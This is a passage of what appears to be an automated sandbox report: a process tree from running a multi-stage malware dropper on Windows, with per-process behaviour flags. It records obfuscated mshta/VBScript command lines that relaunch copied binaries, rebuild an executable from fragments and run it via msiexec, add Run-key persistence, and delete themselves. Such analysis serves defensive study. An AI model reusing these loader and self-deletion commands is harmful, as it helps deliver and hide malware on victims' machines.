C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵PID:2960
-
-
-
C:\Users\Admin\Pictures\Adobe Films\BjtGsfsmZrBx_hOFQo5f7e1N.exe"C:\Users\Admin\Pictures\Adobe Films\BjtGsfsmZrBx_hOFQo5f7e1N.exe"2⤵
- Executes dropped EXE
PID:2148 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 6603⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 6723⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 8043⤵
- Program crash
PID:2284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 8283⤵
- Program crash
PID:4368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2148 -s 10883⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:1736
-
-
-
C:\Users\Admin\Pictures\Adobe Films\b2chrkPKq8rLN77N8Rq8Yask.exe"C:\Users\Admin\Pictures\Adobe Films\b2chrkPKq8rLN77N8Rq8Yask.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3732
-
-
C:\Users\Admin\Pictures\Adobe Films\fftI1ws3DMgP3nFLvVTxe0_x.exe"C:\Users\Admin\Pictures\Adobe Films\fftI1ws3DMgP3nFLvVTxe0_x.exe"2⤵
- Executes dropped EXE
PID:692 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"3⤵
- Executes dropped EXE
PID:4856 -
C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"C:\Users\Admin\AppData\Local\Temp\BCleanSoft86.exe"4⤵
- Executes dropped EXE
PID:4728
-
-
C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4564 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Soft1WW02.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe" & del C:\ProgramData\*.dll & exit5⤵PID:5860
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Soft1WW02.exe /f6⤵
- Kills process with taskkill
PID:5528
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 66⤵
- Delays execution with timeout.exe
PID:5940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"4⤵
- Executes dropped EXE
PID:2488 -
C:\Users\Admin\AppData\Local\Temp\is-EKR1K.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-EKR1K.tmp\setup.tmp" /SL5="$30294,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe"5⤵PID:1508
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT6⤵
- Executes dropped EXE
PID:5140 -
C:\Users\Admin\AppData\Local\Temp\is-3TOFF.tmp\setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-3TOFF.tmp\setup.tmp" /SL5="$302D2,1570064,56832,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5320 -
C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe"C:\Program Files (x86)\FarLabUninstaller\NDP472-KB4054531-Web.exe" /q /norestart8⤵
- Executes dropped EXE
PID:5160 -
C:\f9c32422f3636bb6d550\Setup.exeC:\f9c32422f3636bb6d550\\Setup.exe /q /norestart /x86 /x64 /web9⤵
- Loads dropped DLL
- Checks processor information in registry
PID:5736
-
-
-
C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe"C:\Program Files (x86)\FarLabUninstaller\FarLabUninstaller.exe" ss18⤵
- Executes dropped EXE
PID:3788
-
-
C:\Users\Admin\AppData\Local\Temp\is-8ALGM.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-8ALGM.tmp\postback.exe" ss18⤵
- Executes dropped EXE
PID:4368
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\inst2.exe"C:\Users\Admin\AppData\Local\Temp\inst2.exe"4⤵
- Executes dropped EXE
PID:4320
-
-
C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"C:\Users\Admin\AppData\Local\Temp\askinstall60.exe"4⤵
- Executes dropped EXE
PID:4044 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:5988
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:6136
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"4⤵
- Executes dropped EXE
PID:4260 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4260 -s 15685⤵
- Program crash
PID:5584
-
-
-
C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"C:\Users\Admin\AppData\Local\Temp\ligr-game.exe"4⤵
- Executes dropped EXE
PID:5236
-
-
C:\Users\Admin\AppData\Local\Temp\customer7.exe"C:\Users\Admin\AppData\Local\Temp\customer7.exe"4⤵
- Executes dropped EXE
PID:5364
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"4⤵
- Executes dropped EXE
PID:5488 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5488 -s 6725⤵
- Program crash
PID:5772
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5488 -s 6845⤵
- Program crash
PID:5920
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5488 -s 7125⤵
- Program crash
PID:6008
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5488 -s 7245⤵
- Program crash
PID:196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5488 -s 9045⤵
- Program crash
PID:4888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5488 -s 10205⤵
- Program crash
PID:1864
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5488 -s 12925⤵
- Program crash
PID:5152
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5488 -s 6645⤵
- Program crash
PID:4812
-
-
-
C:\Users\Admin\AppData\Local\Temp\sfx.exe"C:\Users\Admin\AppData\Local\Temp\sfx.exe"4⤵
- Executes dropped EXE
PID:5556 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Executes dropped EXE
PID:3756 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )6⤵PID:1240
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe" ) do taskkill -f -iM "%~NxM"7⤵PID:4716
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi8⤵
- Executes dropped EXE
PID:4788 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵PID:1532
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"10⤵PID:5948
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )9⤵PID:5548
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC10⤵PID:3592
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "11⤵PID:4564
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"11⤵PID:5680
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC11⤵
- Loads dropped DLL
PID:10852
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "LzmwAqmV.exe"8⤵
- Kills process with taskkill
PID:1316
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"4⤵
- Executes dropped EXE
PID:5620
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5688
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\pLEyAg1mYliSL5jFWBNHmVOT.exe"C:\Users\Admin\Pictures\Adobe Films\pLEyAg1mYliSL5jFWBNHmVOT.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1432 -
C:\Users\Admin\Pictures\Adobe Films\pLEyAg1mYliSL5jFWBNHmVOT.exe"C:\Users\Admin\Pictures\Adobe Films\pLEyAg1mYliSL5jFWBNHmVOT.exe"3⤵
- Executes dropped EXE
PID:4984
-
-
C:\Users\Admin\Pictures\Adobe Films\pLEyAg1mYliSL5jFWBNHmVOT.exe"C:\Users\Admin\Pictures\Adobe Films\pLEyAg1mYliSL5jFWBNHmVOT.exe"3⤵
- Executes dropped EXE
PID:4000
-
-
C:\Users\Admin\Pictures\Adobe Films\pLEyAg1mYliSL5jFWBNHmVOT.exe"C:\Users\Admin\Pictures\Adobe Films\pLEyAg1mYliSL5jFWBNHmVOT.exe"3⤵
- Executes dropped EXE
PID:2264
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lwi7kJfiwWPFinTHRNx5r5xN.exe"C:\Users\Admin\Pictures\Adobe Films\lwi7kJfiwWPFinTHRNx5r5xN.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1920 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
PID:4452 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵
- Loads dropped DLL
PID:7868 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b8,0x1e8,0x7ffccddbdec0,0x7ffccddbded0,0x7ffccddbdee05⤵PID:8476
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff753039e70,0x7ff753039e80,0x7ff753039e906⤵PID:8512
-
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --mojo-platform-channel-handle=1752 /prefetch:85⤵PID:8776
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1704 /prefetch:25⤵PID:8768
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --mojo-platform-channel-handle=2064 /prefetch:85⤵PID:9000
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2604 /prefetch:15⤵PID:9300
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2616 /prefetch:15⤵PID:9316
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3308 /prefetch:25⤵PID:10968
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --mojo-platform-channel-handle=3784 /prefetch:85⤵PID:4912
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --mojo-platform-channel-handle=3748 /prefetch:85⤵PID:7400
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --mojo-platform-channel-handle=3592 /prefetch:85⤵PID:7660
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --mojo-platform-channel-handle=1696 /prefetch:85⤵PID:9080
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1672,3961125956663584107,11986853289763560736,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7868_929325355" --mojo-platform-channel-handle=3468 /prefetch:85⤵PID:5828
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\JuvbRlwjWPdBcD_UwijL0gMs.exe"C:\Users\Admin\Pictures\Adobe Films\JuvbRlwjWPdBcD_UwijL0gMs.exe"2⤵
- Executes dropped EXE
PID:2960 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\JuvbRlwjWPdBcD_UwijL0gMs.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\JuvbRlwjWPdBcD_UwijL0gMs.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵PID:4972
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\JuvbRlwjWPdBcD_UwijL0gMs.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\JuvbRlwjWPdBcD_UwijL0gMs.exe" ) do taskkill -im "%~NxK" -F4⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
PID:4508 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵PID:3316
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵PID:3932
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵PID:4320
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵PID:5100
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:5764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵PID:5804
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
PID:6096
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "JuvbRlwjWPdBcD_UwijL0gMs.exe" -F5⤵
- Kills process with taskkill
PID:4808
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ivph15pXbD4NCZsVAjvIYlRP.exe"C:\Users\Admin\Pictures\Adobe Films\ivph15pXbD4NCZsVAjvIYlRP.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1036 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im ivph15pXbD4NCZsVAjvIYlRP.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ivph15pXbD4NCZsVAjvIYlRP.exe" & del C:\ProgramData\*.dll & exit3⤵PID:1176
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ivph15pXbD4NCZsVAjvIYlRP.exe /f4⤵
- Kills process with taskkill
PID:188
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:5180
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\uipDdhmRp9eBVZ0eHdxCRnhK.exe"C:\Users\Admin\Pictures\Adobe Films\uipDdhmRp9eBVZ0eHdxCRnhK.exe"2⤵
- Executes dropped EXE
PID:400 -
C:\Users\Admin\AppData\Local\Temp\is-2O02Q.tmp\uipDdhmRp9eBVZ0eHdxCRnhK.tmp"C:\Users\Admin\AppData\Local\Temp\is-2O02Q.tmp\uipDdhmRp9eBVZ0eHdxCRnhK.tmp" /SL5="$10210,506127,422400,C:\Users\Admin\Pictures\Adobe Films\uipDdhmRp9eBVZ0eHdxCRnhK.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4772 -
C:\Users\Admin\AppData\Local\Temp\is-RPNHE.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-RPNHE.tmp\DYbALA.exe" /S /UID=27104⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
PID:4448 -
C:\Program Files\Windows Mail\ECFYPHRPTQ\foldershare.exe"C:\Program Files\Windows Mail\ECFYPHRPTQ\foldershare.exe" /VERYSILENT5⤵PID:4664
-
-
C:\Users\Admin\AppData\Local\Temp\e8-a6176-cd3-c2aa3-3ead1f498c45e\Tyzhipaetele.exe"C:\Users\Admin\AppData\Local\Temp\e8-a6176-cd3-c2aa3-3ead1f498c45e\Tyzhipaetele.exe"5⤵
- Checks computer location settings
PID:4888
-
-
C:\Users\Admin\AppData\Local\Temp\7e-6d53c-d01-35c94-070d84f1284aa\Hosudecida.exe"C:\Users\Admin\AppData\Local\Temp\7e-6d53c-d01-35c94-070d84f1284aa\Hosudecida.exe"5⤵PID:5748
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\m4yvquou.xko\GcleanerEU.exe /eufive & exit6⤵PID:10472
-
C:\Users\Admin\AppData\Local\Temp\m4yvquou.xko\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\m4yvquou.xko\GcleanerEU.exe /eufive7⤵PID:10872
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10872 -s 6528⤵
- Program crash
PID:11088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10872 -s 6688⤵
- Program crash
PID:11244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10872 -s 6328⤵
- Program crash
PID:4688
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10872 -s 6728⤵
- Program crash
PID:4692
-
-
